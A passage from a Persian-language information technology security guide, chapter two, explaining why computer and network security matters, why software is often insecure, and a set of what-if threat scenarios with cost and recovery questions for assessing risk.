‫ﻛﺮﺩﻥ ﻣﻬﺎﺟﻤﻴﻦ ﻫﺮﭼﻨﺪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﻣـﻲﺑﺎﺷـﺪ‬
‫ﻭﻟﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻓﺼﻞ ﺩﻭﻡ‬
‫ﺩﺭﻙ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﺘﻲ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺗﺒﻴـﻴﻦ ﺿـﺮﻭﺭﺕ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ‬
‫ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻧﻔﻮﺫ‬
‫ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﻗﺪﺍﻣﺎﺕ ﺍﻭﻟﻴﻪ ﺟﻬﺖ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ‪ ،‬ﻭ ﻧﻴـﺰ ﭼﻨـﺪ ﺗﻌﺮﻳـﻒ‬
‫ﻓﻨﻲ ﺍﺯ ﻣﺒﺎﺣﺚ ﺍﻣﻨﻴﺘﻲ ﭘﺮﺩﺍﺧﺘـﻪ ﻣـﻲﺷـﻮﺩ‪ .‬ﺗﻌـﺎﺭﻳﻒ ﻛـﺎﻣﻠﺘﺮ ﺩﺭ‬
‫ﺿﻤﻴﻤﻪ ‪ ۱‬ﻫﻤﻴﻦ ﻓﺼﻞ ﻭ ﻧﻴﺰ ﭘﻴﻮﺳﺖ ‪ ۱‬ﻛﺘﺎﺏ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﭼﺮﺍ ﺗﻤﻬﻴﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺿﺮﻭﺭﺕ ﺩﺍﺭﻧﺪ؟‬
‫ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯﻫﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ‬
‫ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﺗﻨﻬﺎ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﺷﺪ ﻭ ﻧﻴﺎﺯﻱ ﺑﻪ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻧﺒـﻮﺩ‪ .‬ﺑﻌـﺪ ﺍﺯ ﺁﻧﻜـﻪ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺪﺧﻮﺍﻩ ﺁﻏﺎﺯ ﺑﻪ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﻛﺮﺩﻧـﺪ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻧﻴـﺰ ﺑـﻪ ﺁﻥ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺿـﺎﻓﻪ ﺷـﺪﻧﺪ‪ .‬ﺍﻣـﺮﻭﺯﻩ‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﺯﻣﺎﻥ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﺑﻴﺎﻧﺪﻳﺸﻨﺪ‪ .‬ﻣﻬﻤﺘﺮﻳﻦ ﺩﻻﻳﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫•‬
‫ﺍﺭﺯﺵ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻭ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ -‬ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺴﻴﺎﺭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﻫﺴﺘﻨﺪ‬
‫ﻭ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺁﻧﻬﺎ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﺣﺘـﻲ ﺍﮔـﺮ ﺩﺭ‬
‫ﻼ ﺍﺯ‬
‫ﻳﻚ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻛـﺎﻣ ﹰ‬
‫ﺑﻴﻦ ﻧﺮﻭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺎ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑـﻪ‬
‫ﻧﺼﺐ ﻣﺠﺪﺩ ﻫﻤﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻛﻨﻨﺪ ﻭ ﻣﺘﻌﺎﻗﺒـﹰﺎ ﻻﺯﻡ ﺷـﻮﺩ‬
‫ﻛﻠﻴﺔ ﻧﻴﺎﺯﻫﺎﻱ ﺍﺳﺎﺳﻲ ﻣﺠﺪﺩﹰﺍ ﺗﻌﺮﻳـﻒ ﮔﺮﺩﻧـﺪ‪ .‬ﺍﻳـﻦ ﺍﻣـﺮ‬
‫ﻣﺴﺘﻠﺰﻡ ﺻﺮﻑ ﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺳﺖ؛ ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ‬
‫ﻓﺮﺩ ﻣﺴﺌﻮﻝ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﻛﺎﻓﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﺪﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﻻ ﺩﺭ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﺿﻌﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﭼﺮﺍ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﻏﺎﻟﺒﹰﺎ ﺑﺪﻭﻥ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ‬
‫ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﺩﺍﺭﺩ‪:‬‬
‫•‬
‫ﺳﻬﻞﺍﻧﮕـﺎﺭﻱ ‪ -‬ﺑﺮﻧﺎﻣـﻪﻧﻮﻳـﺴﺎﻥ ﻭ ﻃﺮﺍﺣـﺎﻥ ﺍﺯ ﺍﻫﻤﻴـﺖ‬
‫ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻃﻼﻋﻲ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫•‬
‫ﺍﻭﻟﻮﻳﺖ ﭘﺎﻳﻴﻦ ‪ -‬ﺗﺎ ﭼﻨﺪﻱ ﻗﺒﻞ ﺣﺘﻲ ﻛﺴﺎﻧﻲ ﻛﻪ ﻧـﺴﺒﺖ‬
‫ﺑﻪ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺁﮔـﺎﻫﻲ ﺩﺍﺷـﺘﻨﺪ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﻥ ﺍﻗـﺪﺍﻡ‬
‫ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﺮﺩﻧﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﺗﻮﺟﻪ‬
‫ﻻﺯﻡ ﻭﺍﻗﻊ ﻧﻤﻲﺷﺪ‪.‬‬
‫ﺍﺭﺯﺵ ﺩﺍﺩﻩ ﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ‪ -‬ﺍﻳﻦ ﺩﺍﺩﻩ ﻫـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺷــﺎﻣﻞ ﻟﻴــﺴﺖ ﻣــﺸﺘﺮﻱﻫــﺎ‪ ،‬ﭘــﺮﻭﮊﻩﻫــﺎﻱ ﻣــﺎﻟﻲ ﻭ ﻳــﺎ‬
‫‪Identity Theft‬‬
‫‪3‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫•‬
‫ﺍﺭﺯﺵ ﺩﺍﺩﻩﻫﺎﻱ ﻓﺮﺩﻱ ‪ -‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻓـﺮﺩﻱ‬
‫ﺍﺭﺯﺵ ﻣﺎﺩﻱ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭﻟـﻲ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ‬
‫ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﻥﺁﻭﺭ ﺑﺎﺷﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺩﻭﺑﺎﺭﺓ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻻﺯﻡ ﺑﺎﺷﺪ )ﺗﻌـﺎﺭﻳﻒ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺳـﺮﻗﺖ‬
‫ﻫﻮﻳﺖ‪ ٣‬ﺭﺍ ﻣﻮﺭﺩ ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ(‪.‬‬
‫‪٥٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﻣﺤﺪﻭﺩﻳﺖ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪ ‪ -‬ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺗﺼﻮﺭ ﻣﻲ ﻛﻨﻨﺪ‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺟﻬﺖ ﻃﺮﺍﺣﻲ‪ ،‬ﻛﺪ ﻧﻮﻳﺴﻲ ﻭ ﺁﺯﻣﺎﻳﺶ ﺩﺭ‬
‫ﻃﻮﻝ ﻓﺮﺁﻳﻨﺪ ﺗﻮﻟﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺩﺭ ﺑﺮ ﺩﺍﺷـﺘﻪ ﻭ‬
‫ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ‪.‬‬
‫•‬
‫ﺑــﻲﻧﻈﻤــﻲ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ‪ -‬ﺩﺭ ﻛﺎﺭﻫــﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ‬
‫ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﻲ ﺍﺷــﺘﺒﺎﻫﺎﺕ ﻣــﺸﺎﺑﻪ ﭼﻨــﺪﻳﻦ ﺑــﺎﺭ ﺗﻜــﺮﺍﺭ‬
‫ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻣﻲﮔﺮﺩﻧﺪ‪.‬‬
‫•‬
‫ﺧﻼﻗﻴﺖ ﺗﺒﻬﻜﺎﺭﺍﻥ ‪ -‬ﺍﻧﺴﺎﻥ ﻣﻮﺟﻮﺩ ﺧﻼﻗﻲ ﺍﺳﺖ ﻭ ﺍﻓﺮﺍﺩ‬
‫ﺑﺎﺍﻧﮕﻴﺰﻩ ﻫﻤﻴﺸﻪ ﺑﺮﺍﻱ ﻏﻠﺒﻪ ﺑﺮ ﻣﻮﺍﻧـﻊ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻛـﺸﻒ‬
‫ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺷﻮﻧﺪ ﺭﺍﻫﻲ ﭘﻴـﺪﺍ‬
‫ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪.‬‬
‫•‬
‫ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺑﺮﺍﻥ ‪ -‬ﻛﺎﺭﺑﺮﺍﻥ ﻣﻌﻤﻮﻟﻲ )ﻗﺮﺑﺎﻧﻴﺎﻥ‬
‫ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ( ﺑﻄﻮﺭ ﻃﺒﻴﻌﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻃـﺮﺍﻑ ﺧـﻮﺩ‬
‫ﺁﮔﺎﻫﻲ ﻧﺪﺍﺭﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭘﻲ ﺭﺍﻫﻬﺎﻱ ﻣﻨﺎﺳـﺐ‬
‫ﺟﻬﺖ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫•‬
‫ﻧﮕﺎﻩ ﻏﻴﺮﻭﺍﻗﻌﻲ ﻗﺮﺑﺎﻧﻴﺎﻥ ‪ -‬ﺑﺮﺧـﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺟﺪﻱ ﻧﻤﻲﮔﻴﺮﻧﺪ؛‬
‫ﭼﻮﻥ ﮔﻤﺎﻥ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺣﻤﻠـﻪﺍﻱ ﻋﻠﻴـﻪ ﺁﻧﻬـﺎ ﺻـﻮﺭﺕ‬
‫ﻧﺨﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻧﻬﺎ‬
‫ﺟﻬﺖ ﺩﺭﻙ ﺍﻫﻤﻴﺖ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺍﺳـﺖ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ‬
‫ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﺍﺑﺘﺪﺍ ﻓﺮﺽ ﻛﻨﻴـﺪ ﻣـﺴﺎﺋﻞ ﺯﻳـﺮ ﺍﺗﻔـﺎﻕ ﺍﻓﺘـﺎﺩﻩ‬
‫ﺑﺎﺷﻨﺪ ﻭ ﺳﭙﺲ ﺳﻌﻲ ﻛﻨﻴﺪ ﻧﺘـﺎﻳﺞ ﺍﺣﺘﻤـﺎﻟﻲ ﻫﺮﻳـﻚ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ ﻛﻠﻴـﺪﻱ ﻛـﻪ ﺩﺭ ﺍﺑﺘـﺪﺍﻱ‬
‫ﺻﻔﺤﻪ ﺑﻌﺪﻱ ﺁﻣﺪﻩ ﭘﺎﺳﺦ ﺩﻫﻴﺪ‪.‬‬
‫ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺧﻮﺍﻫﺪ ﺍﻓﺘﺎﺩ ﺍﮔﺮ‪...‬‬
‫‪...‬ﺷﺨﺼﻲ ﺑﻪ ﺧﺎﻧﻪ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺷﻤﺎ ﺣﻤﻠﻪ ﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ‬
‫ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻳﺴﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﻛﻪ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻧﺰﺩﻳﻜﻲ ﺑﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﺑﺎ ﺧﻮﺩ ﺑﺒﺮﺩ‪.‬‬
‫‪...‬ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﭘﺎﻙ ﺷﻮﻧﺪ‪.‬‬
‫‪...‬ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ‪ .‬ﺍﻳﻦ ﺩﺍﺩﻩﻫـﺎ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺑﺎﺷﻨﺪ ﺍﺯ ﻗﺒﻴﻞ‪ :‬ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺏ‬
‫ﺑﺎﻧﻜﻲ‪ ،‬ﻓﻬﺮﺳﺖ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮ ﹺﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ‬
‫ﻭﺏ ﺍﻧﺠﺎﻡ ﺧﺮﻳﺪﻫﺎﻱ ﺑﺮﺧﻂ‪ ،٤‬ﮔﺰﺍﺭﺷﻬﺎﻱ ﻛﺎﺭﻱ ﻣﻬﻢ ﻭ ﺗﻜﺎﻟﻴﻒ‬
‫ﺩﺭﺳﻲ ﻛﻪ ﺍﺭﺯﺵ ﺁﻧﻬﺎ ﻣﻌﺎﺩﻝ ‪ %۵۰‬ﻧﻤﺮﺍﺕ ﺩﺭﺳﻬﺎﻱ ﺗﺮﻡ ﺟـﺎﺭﻱ‬
‫ﺷﻤﺎ ﺍﺳﺖ‪.‬‬
‫‪...‬ﺷﺨﺼﻲ ﻟﺤﻈﻪ ﺑﻪ ﻟﺤﻈﻪ ﻫﺮ ﺁﻧﭽﻪ ﺭﺍ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺩﻫﻴﺪ ﻣﺸﺎﻫﺪﻩ ﻛﻨﺪ ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺁﻥ ﺁﮔﺎﻩ ﺷﻮﺩ‪ ،‬ﺍﺯ ﮔﺸﺖ ﻭ ﮔـﺬﺍﺭ‬
‫ﺷﻤﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺨﺘﻠـﻒ ﻣﻄﻠـﻊ ﺑﺎﺷـﺪ‪ ،‬ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﺑـﺎ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﺎ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻣـﻲﻛﻨﻴـﺪ ﺑﺘﻮﺍﻧـﺪ ﻧـﺎﻡ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ‪.‬‬
‫‪...‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺭﻭﻱ ﻳﻚ ﭘﺮﻭﮊﺓ ﻣﻬﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭ ﺯﻣـﺎﻥ ﺩﺭ ﺁﻥ‬
‫ﻧﻘﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺩﺍﺭﺩ‪ ،‬ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﮔﺮﺩﺩ‪.‬‬
‫‪...‬ﻳﻚ ﻭﻳﺮﻭﺱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺨﺮﺏ ﺑﻪ ﻫﻤﻪ ﺩﻭﺳﺘﺎﻧﺘﺎﻥ ﻛﻪ ﻧﺎﻡ ﺁﻧﻬﺎ‬
‫ﺩﺭ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺛﺒﺖ ﺷﺪﻩ ﺍﺭﺳﺎﻝ ﺷﻮﺩ‪.‬‬
‫‪...‬ﻭﻗﺘﻲ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺗﻠﻔﻦ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻳﺪ ﻣﻼﺣﻈﻪ ﻛﻨﻴﺪ ﻛـﻪ‬
‫ﻣﺒﻠﻎ ﺁﻥ ﺣﺘﻲ ﺍﺯ ﺣﻘﻮﻕ ﻣﺎﻫﻴﺎﻧﺔ ﺷﻤﺎ ﻫﻢ ﺑﻴﺸﺘﺮ ﺍﺳﺖ ﻭ ﺍﻳـﻦ ﺩﺭ‬
‫ﺷﺮﺍﻳﻄﻲ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤـﺌﻦ ﻫـﺴﺘﻴﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﻴـﺰﺍﻥ ﺍﺯ ﺗﻠﻔـﻦ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﺮﺩﻩﺍﻳﺪ‪.‬‬
‫‪...‬ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﺭﺳـﺎﻝ ﺷـﻮﺩ ﻭ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ﻛﻪ ﺍﻳﻦ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺷـﻤﺎ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﺑﺎﻧـﻚ‬
‫ﺳﻌﻲ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﻣﺘﻘﺎﻋﺪ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺯ ﻛـﺎﺭﺕ ﺧـﻮﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩﻩﺍﻳﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺪﻋﺎ ﺩﻟﻴﻞ ﻫﻢ ﺩﺍﺭﺩ‪.‬‬
‫ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺷﻮﺩ ﺑﻪ‬
‫ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ‪ ،‬ﺁﻳﺎ ﺍﻣﻜﺎﻥ ﺗﺮﻣﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﭼﻘﺪﺭ ﺯﻣﺎﻥ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟‬
‫ﭼﻪ ﻣﻘﺪﺍﺭ ﻫﺰﻳﻨﻪ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﻮﺩ؟‬
‫ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫﺪ؟‬
‫ﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﻧﺎﻣﻨﺎﺳﺐ‬
‫ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺟﺎﻧﺒﻲ ﺩﺭ ﺑﺮ ﺩﺍﺭﺩ؟ )ﻣﺜ ﹰ‬
‫ﻭ ﺩﺭ ﻏﻴﺎﺏ ﻣﺴﺌﻮﻝ ﻣﺮﺑﻮﻃﻪ(‬
‫ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻫﻤﻴﺖ ﻣﻮﺿﻮﻉ "ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ" ﺭﺍ ﻣـﺸﺨﺺ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻛﻨﻮﻥ ﻛﻪ ﻣﺘﻮﺟﻪ ﺷﺪﻩﺍﻳﺪ ﺍﻣﻨﻴﺖ ﻣﻮﺿﻮﻋﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ‬
‫ﺍﺳﺖ‪ ،‬ﮔﺎﻡ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﻃﺮﺡ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ‬
‫ﺷﺪﻥ ﻣﻲﺑﺎﺷﺪ‪:‬‬
‫‪Online Shopping‬‬
‫‪4‬‬
‫‪٥١‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﭼﻪ ﻫﺰﻳﻨﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؟‬
‫ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟‬
